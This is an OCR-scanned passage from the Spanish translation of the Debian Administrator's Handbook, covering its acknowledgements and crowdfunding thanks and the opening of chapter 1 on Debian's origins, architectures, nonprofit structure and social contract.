dreas  Olsson,  Andrej  Ricnik,  Andrew  Alderwick,  Anselm  Lingnau,  Antoine  Emerit,  Armin  F.  Gno- 
sa,  Avetis  Kazarian,  Bdale  Garbee,  Benoit  Barthelet,  Bernard  Zijlstra,  Carles  Guadall  Blancafort, 
Carlos  Horowicz  —  Planisys  S.A.,  Charles  Brisset,  Charlie  Orford,  Chris  Sykes,  Christian  Bayle, 
Christian  Leutloff,  Christian  Maier,  Christian  Perrier,  Christophe  Drevet,  Christophe  Schockaert 
(R3vLibre),  Christopher  Allan  Webber,  Colin  Ameigh,  Damien  Dubedat,  Dan  Pettersson,  Dave  Lo¬ 
zier,  David  Bercot,  David  James,  David  Schmitt,  David  Tran  Quang  Ty,  Elizabeth  Young,  Fabian 
Rodriguez,  Ferenc  Kiraly,  Frederic  Perrenot  —  Intelligence  Service  001,  Fumihito  Yoshida,  Gian- 
Maria  Daffre,  Gilles  Meier,  Giorgio  Cittadini,  Hector  Oron  Martinez,  Henry,  Herbert  Kaminski, 
Hideki  Yamane,  Hoffmann  Information  Services  GmbH,  Holger  Burkhardt,  Horia  Ardelean,  Ivo 
Ugrina,  Jan  Dittberner,  Jim  Salter,  Johannes  Obermiiller,  Jonas  Boijall,  Jordi  Fernandez  Moledo, 
Jorg  Willekens,  Joshua,  Kastrolis  Imanta,  Keisuke  Nakao,  Kevin  Audebrand,  Korbinian  Preisler, 
Kristian  Tizzard,  Laurent  Bruguiere,  Laurent  Hamel,  Leurent  Sylvain,  Loi'c  Revest,  Luca  Scara- 
bello,  Lukas  Bai,  Marc  Singer,  Marcelo  Nicolas  Manso,  Marilyne  et  Thomas,  Mark  Janssen  —  Sig- 
1/ 0  Automatisering,  Mark  Sheppard,  Mark  Symonds,  Mathias  Bocquet,  Matteo  Fulgheri,  Michael 
Schaffner,  Michele  Baldessari,  Mike  Chaberski,  Mike  Linksvayer,  Minh  Ha  Duong,  Moreau  Frede¬ 
ric,  Morphium,  Nathael  Pajani,  Nathan  Paul  Simons,  Nicholas  Davidson,  Nicola  Chiapolini,  Ole- 
Morten,  Olivier  Mondoloni,  Paolo  Innocenti,  Pascal  Cuoq,  Patrick  Camelin,  Per  Carlson,  Philip 
Bolting,  Philippe  Gauthier,  Philippe  Teuwen,  PJ  King,  Praveen  Arimbrathodiyil  (j4v4m4n),  Ralf 
Zimmermann,  Ray  McCarthy,  Rich,  Rikard  Westman,  Robert  Kosch,  Sander  Scheepens,  Sebas- 
tien  Picard,  Stappers,  Stavros  Giannouris,  Steve-David  Marguet,  T.  Gerigk,  Tanguy  Ortolo,  Tho¬ 
mas  Hochstein,  Thomas  Muller,  Thomas  Pierson,  Tigran  Zakoyan,  Tobias  Gruetzmacher,  Tour- 
nier  Simon,  Trans-IP  Internet  Services,  Viktor  Ekmark,  Vincent  Demeester,  Vincent  van  Adrig- 
hem,  Volker  Schlecht,  Werner  Kuballa,  Xavier  Neys,  y  a  Yazid  Cassam  Sulliman. 


15  http :  //www.  omg  ubuntu  .co.uk 
16http :  //www.  april .  org 
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Liberation  del  libro  en  frances 


Despues  de  la  publicacion  del  libro  en  ingles  bajo  una  licencia  de  software  libre,  nos  encontra- 
bamos  en  una  situation  extrana:  con  un  libro  libre  que  es  una  traduction  de  un  libro  privativo 
(ya  que  Eyrolles  todavfa  lo  distribuia  comercialmente  bajo  una  licencia  privativa). 

Sabiamos  que  arreglar  esto  nos  llevaria  a  convencer  a  Eyrolles  que  una  licencia  libre  contribuirfa 
al  exito  del  libro  para  poder  corregir  esto.  Se  dio  la  oportunidad  en  2013  cuando  tuvimos  que 
discutir  un  nuevo  contrato  para  actualizar  el  libro  para  Debian  7.  Debido  a  que  liberar  un  libro 
tiene  un  impacto  significativo  en  sus  ventas,  como  un  punto  intermedio,  accedimos  a  llevar  a 
cabo  una  campana  de  financiacion  colectiva  («crowdfunding»)  para  contrarrestar  algunos  de  los 
riesgos  y  contribuir  a  los  costos  de  la  publicacion  de  una  nueva  edition.  Nuevamente  utilizamos 
Ulule  para  dicha  campana: 

http : //www. ulule. com/libe ration- cahier- admin -debian/ 

El  objetivo  eran  15000C  en  30  dias.  Nos  tomo  menos  de  una  semana  llegar  a  dicha  cifra,  y  obtu- 
vimos  la  increible  cifra  de  25518C  de  721  seguidores  cuando  finalizo. 

Tuvimos  contribuciones  importantes  de  empresas  y  organizaciones  cercanas  al  software  libre. 
Permitanos  agradecer  a:  el  sitio  web  LinuxFr.org17,  Korben18,  Addventure19,  Eco-Cystemes20, 
ELOL  SARL21  y  Linuvers22.  Muchas  gracias  a  LinuxFr  y  Korben,  quienes  ayudaron  significativa- 
mente  a  difundir  la  noticia. 

jLa  operation  fue  un  gran  exito  porque  cientos  de  personas  comparten  nuestros  valores  de  li- 
bertad  y  los  defendieron  con  su  dinero!  Por  esto,  muchas  gracias. 

Especialmente  gracias  a  aquellos  que  decidieron  dar  25€  mas  que  el  valor  de  su  recompensa. 
Apreciamos  enormemente  su  fe  en  este  proyecto.  Gracias  Adrien  Guionie,  Adrien  Ollier,  Adrien 
Roger,  Agileo  Automation,  Alban  Duval,  Alex  Viala,  Alexandre  Dupas,  Alexandre  Roman,  Ale¬ 
xis  Bienveniie,  Anthony  Renoux,  Aurelien  Beaujean,  Baptiste  Darthenay,  Basile  Deplante,  Benja¬ 
min  Cama,  Benjamin  Guillaume,  Benoit  Duchene,  Benoit  Sibaud,  Bornet,  Brett  Ellis,  Brice  Sevat, 
Bruno  Le  Goff,  Bruno  Marmier,  Cedric  Briner,  Cedric  Charlet,  Cedrik  Bernard,  Celia  Redondo, 
Cengiz  Unlii,  Charles  Fleche,  Christian  Bayle,  Christophe  Antoine,  Christophe  Bliard,  Christophe 
Carre,  Christophe  De  Saint  Leger,  Christophe  Perrot,  Christophe  Robert,  Christophe  Schockaert, 
Damien  Escoffier,  David  Dellier,  David  Trolle,  Davy  Elubert,  Decio  Valeri,  Denis  Marcq,  Denis 
Soriano,  Didier  Elenaux,  Dirk  Linnerkamp,  Edouard  Postel,  Eric  Coquard,  Eric  Lemesre,  Eric  Part- 
huisot,  Eric  Vernichon,  Erik  Le  Blanc,  Fabian  Culot,  Fabien  Givors,  Florent  Bories,  Florent  Ma- 
chen,  Florestan  Fournier,  Florian  Dumas,  Francois  Ducrocq,  Francois  Lepoittevin,  Fran^ois-Regis 
Vuillemin,  Frederic  Boiteux,  Frederic  Guelen,  Frederic  Keigler,  Frederic  Lietart,  Gabriel  Moreau, 
Gian-Maria  Daffre,  Gregory  Leche,  Gregory  Valentin,  Guillaume  Boulaton,  Guillaume  Chevillot, 
Guillaume  Delvit,  Guillaume  Michon,  Herve  Guimbretiere,  Ivan  Aleman,  Jacques  Bompas,  Jan- 


17  http :  //linuxf  r .  org 

18  http :  //korben  .info 
19http: //www.  add  venture,  f  r 
20http :  //www.  eco-  cyst  ernes  .  com/ 
21http://elol .  f  r 

22  http :  //www.  linuvers .  com 
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nine  Koch,  Jean-Baptiste  Roulier,  Jean-Christophe  Becquet,  Jean-Frangois  Bilger,  Jean-Michel 
Grare,Jean-Sebastien  Lebacq,  Jerome  Ballot,  Jerome  Pellois,  Johan  Roussel,  Jonathan  Gallon,  Jo- 
ris  Dedieu,  Julien  Gilles,  Julien  Groselle,  Kevin  Messer,  Laurent  Espitallier,  Laurent  Fuentes,  Le 
Gout  Du  Libre,  Ludovic  Poux,  Marc  Gasnot,  Marc  Verprat,  Marc-Ftenri  Primault,  Martin  Bour- 
doiseau,  Mathieu  Chapounet,  Mathieu  Emering,  Matthieu  Joly,  Melvyn  Leroy,  Michel  Casabo- 
na,  Michel  Kapel,  Mickael  Tonneau,  Mikael  Marcaud,  Nicolas  Bertaina,  Nicolas  Bonnet,  Nicolas 
Dandrimont,  Nicolas  Dick,  Nicolas  Flicher,  Nicolas  Karolak,  Nicolas  Schont,  Olivier  Gosset,  Oli¬ 
vier  Langella,  Patrick  Francelle,  Patrick  Nomblot,  Philippe  Gaillard,  Philippe  Le  Naour,  Philippe 
Martin,  Philippe  Moniez,  Philippe  Teuwen,  Pierre  Brun,  Pierre  Gambarotto,  Pierre-Dominique 
Perrier,  Quentin  Fait,  Raphael  Enrici  —  Root  42,  Remi  Vanicat,  Rhydwen  Volsik,  RyXeo  SARL, 
Samuel  Boulier,  Sandrine  D’hooge,  Sebasiten  Piguet,  Sebastien  Bollingh,  Sebastien  Kalt,  Sebas- 
tien  Lardiere,  Sebastien  Poher,  Sebastien  Prosper,  Sebastien  Raison,  Simon  Folco,  Societe  Teicee, 
Stephane  Leibovitsch,  Stephane  Paillet,  Steve-David  Marguet,  Sylvain  Desveaux,  Tamatoa  Davio, 
Thibault  Taillandier,  Thibaut  Girka,  Thibaut  Poullain,  Thierry  Jaouen,  Thomas  Etcheverria,  Tho¬ 
mas  Vidal,  Thomas  Vincent,  Vincent  Avez,  Vincent  Merlet,  Xavier  Alt,  Xavier  Bensemhoun,  Xa¬ 
vier  Devlamynck,  Xavier  Guillot,  Xavier  Jacquelin,  Xavier  Neys,  Yannick  Britis,  Yannick  Guerin 
e  Yves  Martin. 


Agradecimientos  especiales  para  colaboradores 

Este  libro  no  seria  lo  que  es  sin  la  colaboracion  de  varias  personas,  cada  una  de  las  cuales  cum- 
plio  un  papel  importante  durante  la  fase  de  traduccion  y  despues.  Nos  gustaria  dar  las  gracias  a 
Marilyne  Brun,  quien  nos  ayudo  a  traducir  el  capitulo  de  ejemplo  y  que  ha  trabajado  con  noso- 
tros  para  definir  unas  reglas  comunes  para  la  traduccion.  Tambien  reviso  varios  capitulos  en  los 
que  necesitabamos  desesperadamente  una  ayuda  adicional.  Muchas  gracias  a  Anthony  Baldwin 
(de  Linguas  Baldwin)  que  ha  traducido  varios  capitulos  para  nosotros. 

Hemos  aprovechado  la  generosa  ayuda  de  los  correctores:  Daniel  Phillips,  Gerold  Rupprecht, 
Gordon  Dey,  Owens  Jacob,  y  Syroid  Tom.  Cada  uno  de  ellos  examino  muchos  capitulos.  jMuchas 
gracias! 

Luego,  una  vez  que  se  libero  la  version  en  ingles,  por  supuesto  que  obtuvimos  muchos  comenta- 
rios  y  sugerencias  de  los  lectores,  y  aun  mas  de  los  varios  equipos  que  trabajaron  en  la  traduccion 
de  este  libro  a  sus  idiomas.  jGracias! 

Nos  gustaria  agradecer  tambien  a  los  lectores  del  libro  en  trances,  quienes  nos  proporcionaron 
lindas  citas  para  confirmar  que  el  libro  realmente  valia  la  pena  ser  traducido:  gracias  a  Christian 
Perrier,  David  Bercot,  Etienne  Lietart  y  a  Gilles  Roussi.  Stefano  Zacchiroli  —  el  lider  del  proyec- 
to  Debian  durante  la  campana  de  financiacion  —  tambien  se  merece  un  gran  agradecimiento, 
avalando  el  proyecto  con  una  cita  explicando  que  hacian  mucha  falta  libros  libres. 

Si  tiene  el  placer  de  leer  estas  lineas  en  papel  impreso,  entonces  unase  a  nosotros  en  el  agradeci¬ 
miento  a  Benoit  Guillon,  Jean-Come  Charpentier  y  a  Sebastien  Mengin  quienes  trabajaron  en  el 
diseno  interior  del  libro.  Benoit  es  el  autor  original  de  dblatex23  —  la  herramienta  que  usamos 

23http://dblatex.  sourceforge.  net 
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para  convertir  DocBook  en  LaTeX  (y  luego  en  PDF).  Sebastien  es  el  disenador  que  creo  el  bonito 
diseno  de  este  libro  y  Jean-Come  es  el  experto  en  LaTeX  que  lo  implemento  como  una  hoja  de 
estilo  usable  con  dblatex.  jGracias  chicos  por  el  duro  trabajo  que  realizaron! 

Finalmente,  gracias  a  Thierry  Stempfel  por  las  bonitas  imagenes  que  aparecen  en  la  presenta- 
cion  de  cada  capftulo  y  gracias  a  Doru  Patrascu  por  la  bonita  cubierta  del  libro. 


Gracias  a  los  traductores 

Siempre  que  se  ha  liberado  una  nueva  version  del  libro,  numerosos  voluntaries  se  han  encargado 
de  traducirlo  a  multitud  de  idiomas  como  el  arabe,  el  portugues  de  Brasil,  el  aleman,  el  italiano, 
el  espanol,  etc.  Descubra  la  lista  completa  de  las  traducciones  del  libro  en  su  pagina  web  http : 
//debian- handbook. inf o/get/#ot her 

Nos  gustaria  dar  las  gracias  a  tanto  a  los  traductores  como  tambien  a  quienes  han  revisado  las 
traducciones.  Vuestro  trabajo  es  tenido  muy  en  consideracion  porque  lleva  Debian  a  las  manos 
de  millones  de  personas  que  no  saben  leer  en  ingles. 


Reconocimientos  personales  de  Raphael 

En  primer  lugar  me  gustaria  dar  las  gracias  a  Nat  Makarevitch,  quien  me  ofrecio  la  posibilidad  de 
escribir  este  libro  y  quien  me  oriento  durante  el  ano  que  tomo  hacerlo.  Gracias  tambien  al  buen 
equipo  de  Eyrolles  y  a  Muriel  Shan  Sei  Fan  en  particular.  Ella  ha  sido  muy  paciente  conmigo  y 
he  aprendido  mucho  con  ella. 

El  periodo  de  tiempo  que  duraron  las  campanas  de  Ulule  fue  muy  exigente  para  mi,  pero  me 
gustaria  dar  las  gracias  a  todos  los  que  colaboraron  para  que  fueran  un  exito  y,  en  particular, 
al  equipo  de  Ulule  que  respondio  muy  rapidamente  a  mis  muchas  peticiones.  Gracias  tambien 
a  todos  los  que  promocionaron  los  proyectos.  No  tengo  ninguna  lista  donde  se  recoja  de  forma 
exhaustiva  todas  las  personas  que  me  ayudaron  (y  si  la  tuviera  probablemente  seria  demasiado 
larga),  pero  me  gustaria  dar  las  gracias  a  algunas  personas  que  estuvieron  en  contacto  conmigo: 
Joey-Elijah  Sneddon  y  Benjamin  Humphrey  de  OMG!  Ubuntu,  Florent  Zara  de  LinuxFr.org,  Manu 
de  Korben.info,  Frederic  Couchet  de  April.org,  Jake  Edge  de  Linux  Weekly  News,  Clement  Lefeb- 
vre  de  Linux  Mint,  Ladislav  Bodnar  de  Distrowatch,  Steve  Kemp  de  Debian-Administration.org, 
Christian  Pfeiffer  Jensen  de  Debian-News.net,  Artem  Nosulchik  de  LinuxScrew.com,  Stephan  Ra- 
moin  de  Gandi.net,  Matthew  Bloch  de  Bytemark.co.uk,  el  equipo  de  Divergence  FM,  Rikki  Kite 
de  Linux  New  Media,  Jono  Bacon,  el  equipo  de  marketing  de  Eyrolles  y  otros  muchos  que  me  he 
olvidado  (siento  haberlos  olvidado). 

Me  gustaria  hacer  llegar  mi  agradecimiento  personal  a  Roland  Mas,  mi  co-autor.  Hemos  estado 
colaborando  en  este  libro  desde  el  principio  y  siempre  ha  estado  a  la  altura  del  desafio.  Y  debo 
decir  que  completar  el  Libro  del  administrador  de  Debian  ha  sido  un  monton  de  trabajo... 

Por  ultimo,  pero  no  menos  importante,  gracias  a  mi  esposa  Sophie.  Ha  sido  un  gran  apoyo  para 
mi  trabajo  en  este  libro  y  en  Debian  en  general.  Hubo  demasiados  dias  (y  noches)  en  que  la  deje 
sola  con  nuestros  2  hijos  para  lograr  avanzar  algo  en  el  libro.  Estoy  muy  agradecido  por  su  apoyo 
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y  se  lo  afortunado  que  soy  de  tenerla. 


Agradecimientos  personales  de  Roland 

Bien,  Raphael  ya  adelanto  gran  parte  de  mis  agradecimientos  «externos».  Aun  asi,  voy  a  enfati- 
zar  mi  agradecimiento  personal  a  la  buena  gente  de  Eyrolles  con  la  que  la  colaboracion  siempre 
ha  sido  agradable  y  fluida.  Esperemos  que  los  resultados  de  sus  excelentes  consejos  no  se  hayan 
perdido  en  la  traduccion. 

Estoy  extremadamente  agradecido  a  Raphael  por  llevar  a  cabo  la  parte  administrativa  de  la  edi- 
cion  en  ingles.  Desde  organizar  la  campana  para  obtener  fondos  hasta  los  detalles  de  la  aparien- 
cia  del  libro,  crear  un  libro  traducido  es  mucho  mas  que  una  simple  traduccion  y  una  correccion, 
Raphael  lo  hizo  todo  (o  por  lo  menos  delego  y  lo  superviso).  Asi  que  gracias. 

Gracias  tambien  a  todos  los  que  han  contribuido  mas  o  menos  directamente  con  este  libro,  pro- 
porcionando  aclaraciones,  explicaciones  o  consejos  para  la  traduccion.  Son  demasiados  para 
mencionar,  pero  la  mayoria  de  ellos  se  pueden  encontrar  en  varios  canales  de  IRC  de  #debian-*. 

Hay,  por  supuesto,  algo  de  superposicion  con  el  conjunto  de  personas  anterior,  pero  merecen 
agradecimientos  especificos  aquellos  que  hacen  Debian  especificamente.  No  habria  libro  sin 
ellos,  y  todavia  estoy  sorprendido  por  lo  que  el  proyecto  Debian  en  su  conjunto  produce  y  pone 
a  disposicion  de  todos  y  cada  uno. 

Agradezco  mas  personalmente  a  mis  amigos  y  mis  clientes,  por  su  comprension  cuando  demo- 
raba  en  responder  porque  estaba  trabajando  en  este  libro,  y  tambien  por  su  constante  apoyo, 
aliento  e  inspiracion.  Ustedes  saben  quienes  son,  gracias. 

Por  ultimo,  y  estoy  seguro  de  que  se  sorprenderian  por  ser  mencionados  aqui,  pero  me  gustaria 
expresar  mi  agradecimiento  a  Terry  Pratchett,  Jasper  Fforde,  Tom  Holt,  William  Gibson,  Neal 
Stephenson  y  por  supuesto  al  difunto  Douglas  Adams.  Las  incontables  horas  que  pase  disfrutan- 
do  de  sus  libros  son  directamente  responsables  de  que  yo  sea  capaz  de  formar  parte  primero  en 
la  traduccion  de  uno  y  luego  escribiendo  nuevas  partes. 
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Antes  de  sumergirnos  directamente  en  la  tecnologia,  vamos  a  echar  un  vistazo  a  que  es  el  proyecto 
Debian,  sus  objetivos,  sus  mediosy  su  funcionamiento. 


1.1  ^ Que  es  Debian? 


CULTURA  No  busque  mas:  Debian  no  es  un  acronimo.  Este  nombre  es  en  realidad  una  palabra 

El  origen  del  nombre  compuesta  por  dos  nombres:  los  de  Ian  Murdock  y  su  novia  en  ese  momento,  Debra. 
Debian  Debra  +  Ian  =  Debian. 


Debian  es  una  distribucion  GNU/Linux.  Mas  adelante  veremos  con  mas  detalle  que  es  una  distri- 
bucion  en  la  Seccion  1.5,  «El  papel  de  las  distribuciones»  pagina  24,  pero  por  ahora  nos  limita- 
remos  a  decir  que  es  un  sistema  operativo  complete,  incluyendo  el  software  y  los  sistemas  para 
su  instalacion  y  gestion,  todo  ello  basado  en  el  nucleo  Linux  y  software  libre  (en  especial  del 
proyecto  GNU). 

Cuando  creo  Debian  en  1993,  bajo  la  direccion  de  la  FSF,  Ian  Murdock  tenia  unos  objetivos  claros 
que  expreso  en  el  Manifiesto Debian  («Debian  Manifesto))).  El  sistema  operativo  libre  que  buscaba 
tendria  que  tener  dos  caracteristicas  principales.  En  primer  lugar,  la  calidad:  Debian  se  desarro- 
llaria  con  el  mayor  cuidado,  para  ser  dignos  del  nucleo  Linux.  Tambien  seria  una  distribucion 
no  comercial,  lo  suficientemente  creible  como  para  competir  con  las  principales  distribuciones 
comerciales.  Esta  doble  ambicion,  a  su  modo  de  ver,  solo  podia  lograrse  mediante  la  apertura 
del  proceso  de  desarrollo  de  Debian  al  igual  que  la  de  Linux  y  del  proyecto  GNU.  Por  lo  tanto,  la 
revision  entre  pares  mejoraria  continuamente  el  producto. 


CULTURA  El  proyecto  GNU  es  un  conjunto  de  software  libre  desarrollado,  o  patrocinado,  por 
GNU  el  proyecto  de  la  la  «Free  Software  Foundation»  (FSF),  creado  por  su  llder  emblematico  el  Dr.  Richard 
FSF  M.  Stallman.  GNU  es  un  acronimo  recursivo,  que  significa  «GNU  no  es  Unix». 


CULTURA  El  fundador  de  la  FSF  y  autor  de  la  licencia  GPL,  Richard  M.  Stallman  (a  menudo 

Richard  Stallman  conocido  por  sus  inicales,  RMS)  es  un  llder  carismatico  del  movimiento  del  Soft¬ 

ware  Libre.  Debido  a  que  es  intrasigente  en  su  posicion  no  es  admirado  de  forma 
unanime,  pero  sus  contribuciones  no  tecnicas  al  software  libre  (en  el  piano  jurldico 
y  filosofico)  son  respetadas  por  todo  el  mundo. 


1.1.1.  Un  sistema  operativo  multiplataforma 


COMUNIDAD  lan  Murdock,  fundador  del  proyecto  Debian,  fue  su  primer  llder  desde  1993  a  1996. 

El  viaje  de  Ian  Murdock  Luego  de  pasar  la  batuta  a  Bruce  Perens,  lan  tomo  un  rol  menos  publico.  Volvio  a 

trabajar  detras  del  escenario  de  la  comunidad  de  software  libre,  creando  la  empresa 
Progeny  con  la  intencion  de  promocionar  una  distribucion  derivada  de  Debian.  Es¬ 
te  proyecto  fue,  lamentablemente,  un  fracaso  comercial  y  abandono  su  desarrollo. 
La  companla,  luego  de  varios  anos  apenas  sobreviviendo  como  un  simple  provee- 
dor  de  servicios,  eventualmente  presento  su  bancarrota  en  abril  de  2007.  De  los 
varios  proyectos  iniciados  por  Progeny  solo  sobrevivio  discover ,  una  herramienta 
de  deteccion  automatica  de  hardware. 
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Debian,  manteniendose  fiel  a  sus  principios  iniciales,  ha  tenido  tanto  exito  que,  hoy  en  di'a,  ha 
alcanzado  un  tamano  enorme.  Las  12  arquitecturas  que  ofrece  cubren  10  arquitecturas  de  hard¬ 
ware  y  2  nucleos  (Linux  y  FreeBSD),  aunque  las  adaptaciones  basadas  en  FreeBSD  no  forman 
parte  de  las  arquitecturas  soportadas  de  forma  oficial.  Por  otra  parte,  con  mas  de  21000  paque- 
tes  fuente,  el  software  disponible  puede  satisfacer  casi  cualquier  necesidad  que  uno  pueda  tener 
ya  sea  en  casa  o  en  la  empresa. 

Solo  el  tamano  de  la  distribucion  puede  ser  un  incoveniente:  no  es  muy  razonable  distribuir  84 
CD-ROMs  para  instalar  la  version  completa  en  un  equipo  estandar...  es  por  eso  que  Debian  es 
considerada  cada  vez  mas  como  una  «metadistribucion»  desde  la  que  se  pueden  extraer  distri- 
buciones  mas  especfficas  orientada  a  un  publico  en  particular:  Debian-Desktop  para  uso  ofima- 
tico  tradicional,  Debian-Edu  para  uso  educativo  y  pedagogico  en  entornos  academicos,  Debian- 
Med  para  aplicaciones  medicas,  Debian-Junior  para  ninos,  etc.  Puede  encontrar  una  lista  mas 
completa  de  los  subproyectos  en  la  seccion  dedicada  a  ese  proposito,  revise  la  Seccion  1. 3.3.1, 
«Subproyectos  Debian  existentes»  pagina  18. 

Estas  vistas  parciales  de  Debian  se  organizan  en  un  marco  bien  definido,  lo  que  garantiza  compa- 
tibilidad  sin  problemas  entre  las  diferentes  subdistribuciones.  Todas  ellas  siguen  la  planificacion 
general  para  el  lanzamiento  de  nuevas  versiones.  Y  dado  que  estan  construidas  sobre  la  misma 
base,  pueden  extenderse,  completarse  y  personalizarse  facilmente  con  las  aplicaciones  disponi- 
bles  en  los  repositories  de  Debian. 

Todas  las  herramientas  de  Debian  operan  con  esto  en  mente:  debian -cd  permite  desde  hace 
tiempo  crear  conjuntos  de  CD-ROMs  que  solo  contengan  un  conjunto  de  paquetes  preseleccio- 
nados,  debian-installeres  tambien  un  instalador  modular  que  se  adapta  facilmente  a  las  ne- 
cesidades  especiales,  APT  permite  instalar  paquetes  de  varios  origenes  garantizando  al  mismo 
tiempo  la  consistencia  global  del  sistema. 


VOLVER  A  LOS  CIMIENTOS  El  termino  «arquitectura»  indica  un  tipo  de  equipo  (entre  los  mas  conocidos  se  en- 
Para  cada  equipo  su  cuentran  Mac  o  PC).  Cada  arquitectura  se  diferencia  principalmente  por  su  tipo 

arquitectura  de  Procesador,  normalmente  incompatibles  con  otros  procesadores.  Estas  diferen- 

cias  en  el  hardware  implican  diferentes  formas  de  funcionamiento  por  lo  que  es 
necesario  que  se  compile  el  software  especificamente  para  cada  arquitectura. 

La  mayoria  del  software  disponible  en  Debian  esta  escrito  en  lenguajes  de  progra¬ 
macion  adaptables  («portable»):  el  mismo  codigo  fuente  se  puede  compilar  para 
varias  arquitecturas.  En  efecto,  un  binario  ejecutable,  siempre  compilado  para  una 
arquitectura  especifica  por  lo  general  no  funcionara  en  otras  arquitecturas. 

Recuerde  que  cada  programa  es  creado  escribiendo  codigo  fuente,  este  codigo  fuen¬ 
te  es  un  archivo  de  texto  compuesto  por  instrucciones  en  un  determinado  lenguage 
de  programacion.  Antes  de  poder  utilizar  el  software  es  necesario  compilar  el  codigo 
fuente,  lo  que  significa  transformar  el  codigo  en  un  binario  (una  serie  de  instruc¬ 
ciones  de  maquina  ejecutable  por  el  procesador).  Cada  lenguaje  de  programacion 
tiene  un  compilador  especifico  para  ejecutar  esta  operacion  (por  ejemplo,  gcc  para 
el  lenguaje  de  programacion  C). 
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HERRAMIENTA  debian-cd  crea  imageries  ISO  para  medios  de  instalacion  (CD,  DVD,  Blu-Ray,  etc.) 
Creando  un  CD-ROM  de  I ista.s  para  usar.  Cualquier  asunto  relacionado  con  este  software  se  discute  (en  in- 

Debian  gles)  en  ^a  lista  de  correo  debian-cd@lists.debian.org.  El  equipo  esta  liderado  por 

Steve  McIntyre  que  es  quien  se  encarga  de  las  compilaciones  ISO  oficiales  de  De- 
bian. 


HERRAMIENTA  debian  -  ins  talle  r  es  el  nombre  del  programa  de  instalacion  de  Debian.  Su  dise- 
El  instalador  do  m°dular  permite  que  sea  usado  en  un  amplio  rango  de  escenarios.  El  trabajo 
desarrollo  es  coordinado  en  la  lista  de  correo  debian-boot@lists.debian.org  bajo  la 
direccion  de  Cyril  Brulebois. 


1.1.2  La  calidad  del  software  libre 

Debian  sigue  todos  los  principios  del  Software  Libre  y  sus  nuevas  versiones  no  se  publican  hasta 
que  esten  listas.  Los  desarrolladores  no  se  ven  obligados  ni  presionados  a  trabajar  mas  rapido 
para  cumplir  con  un  plazo  arbitrario.  Las  personas  se  quejan  con  frecuencia  del  largo  tiempo 
entre  versiones  estables  de  Debian,  pero  esta  precaucion  tambien  garantiza  la  legendaria  fia- 
bilidad  de  Debian:  son  realmente  necesarios  largos  meses  de  pruebas  para  que  la  distribucion 
completa  reciba  la  etiqueta  «estable». 

Debian  no  realizara  compromises  en  cuanto  a  calidad:  todos  los  errores  crfticos  conocidos  se  re- 
suelven  en  cada  nueva  version,  incluso  si  esto  requiere  retrasar  la  fecha  de  lanzamiento  prevista 
inicialmente. 


1.1.3  El  marco  legal:  una  organizacion  sin  animo  de  lucro 

Legalmente  hablando,  Debian  es  un  proyecto  gestionado  por  una  asociacion  de  voluntaries  nor- 
teamericana  sin  fines  de  lucro.  El  proyecto  cuenta  alrededor  de  un  miliar  de  desarrolladores  De¬ 
bian  pero  agrupa  a  un  ntimero  mucho  mayor  de  colaboradores  (traductores,  informadores  de 
errores,  artistas,  desarrolladores  casuales,  etc.). 

Para  llevar  su  mision  a  buen  termino,  Debian  cuenta  con  una  gran  infraestructura  con  muchos 
servidores  conectados  a  traves  de  Internet  ofrecidos  por  muchos  patrocinadores. 


COMUNIDAD 

Detras  de  Debian,  la 
asociacion  SPI  y  las 
filiales  locales 


Debian  no  posee  servidor  alguno  bajo  su  nombre  ya  que  solo  es  un  proyecto  den- 
tro  de  la  asociacion  «Software  in  the  Public  lnterest»  (SPI:  «Software  en  el  interes 
publico»),  la  cual  administra  el  hardware  y  los  aspectos  economicos  (donaciones, 
compra  de  equipos,  etc.).  Si  bien  fue  originalmente  creada  para  el  proyecto  De¬ 
bian,  esta  asociacion  ahora  alberga  otros  proyectos  de  software,  en  especial  la  base 
de  datos  PostgreSQL,  Freedesktop.org  (proyecto  para  la  estandarizacion  de  varias 
partes  de  los  entornos  graficos  de  escritorios,  como  GNOME  y  KDE)  y  el  conjunto 
ofimatico  Libre  Office. 


http://www.spi-inc.org/ 


El  manual  del  Administrador  de  Debian 


Ademas  de  SPI,  varias  asociaciones  locales  colaboran  estrechamente  con  Debian 
con  el  fin  de  generar  fondos  para  Debian  sin  que  este  todo  centralizado  en  EE.UU., 
en  el  lunfardo  Debian  se  los  conoce  como  «Trusted  Organizations))  («organizacio- 
nes  de  confianza»).  Esta  configuracion  evita  los  costos  prohibitivos  de  las  transfe¬ 
rences  internacionales  y  encaja  perfectamente  con  la  naturaleza  descentralizada 
del  proyecto. 

Si  bien  la  lista  de  organizaciones  de  confianza  es  relativamente  corta,  existen  mu- 
chas  mas  asociaciones  relacionadas  con  Debian  cuyo  objetivo  es  promocionar  De¬ 
bian:  Debian  France ,  Debian-ES,  debian. ch  y  otras  alrededor  del  mundo.  ;No  dude 
en  unirse  a  su  asociacion  local  para  respaldar  el  proyecto! 

•-  http : //wiki . debian . org/Teams/ Audit or/Organizations 
•-  http://france.debian.net/ 

■*-  http://www.debian-es.org/ 
http://debian.ch/ 


1.2.  Los  documentos  de  fundacion 

Unos  anos  despues  de  su  lanzamiento  inicial,  Debian  formalizo  los  principios  que  debia  seguir 
como  proyecto  de  software  libre.  Esta  decision  activista  permite  un  crecimiento  ordenado  y 
pacifico  asegurando  que  todos  sus  miembros  avancen  en  la  misma  direction.  Para  ser  un  desa- 
rrollador  Debian,  cualquier  candidate  debe  confirmar  y  demostrar  su  apoyo  y  adhesion  a  los 
principios  establecidos  en  los  documentos  de  fundacion  del  proyecto. 

Se  debate  constantemente  acerca  del  proceso  de  desarrollo,  pero  los  documentos  de  fundacion 
han  sido  apoyados  de  forma  ampliay  consensuada,  por  lo  que  rara  vez  cambian.  La  constitution 
de  Debian  tambien  ofrece  otras  garantias  para  su  estabilidad:  se  necesita  una  mayoria  calificada 
de  tres  cuartas  partes  para  aprobar  cualquier  cambio. 


1.2.1  El  compromiso  hacia  los  Usuarios 

El  proyecto  tambien  tiene  un  «contrato  social».  ^Que  lugar  tiene  dicho  texto  en  un  proyecto 
disenado  unicamente  para  el  desarrollo  de  un  sistema  operativo?  Tiene  una  explication  bastante 
simple:  el  trabajo  de  Debian  es  para  sus  usuarios,  y  por  lo  tanto,  por  extension,  para  la  sociedad. 
Este  contrato  resume  los  compromises  que  asume  el  proyecto.  Vamos  a  analizarlos  con  mayor 
detalle: 

1.  Debian  permanecera  libre  100  %. 

Esta  es  la  regia  numero  1 .  Debian  esta  y  permanecera  conformado  entera  y  exclusivamente 
por  software  libre.  Ademas,  todo  el  desarrollo  de  software  dentro  del  proyecto  Debian  sera, 
en  si  mismo,  libre. 


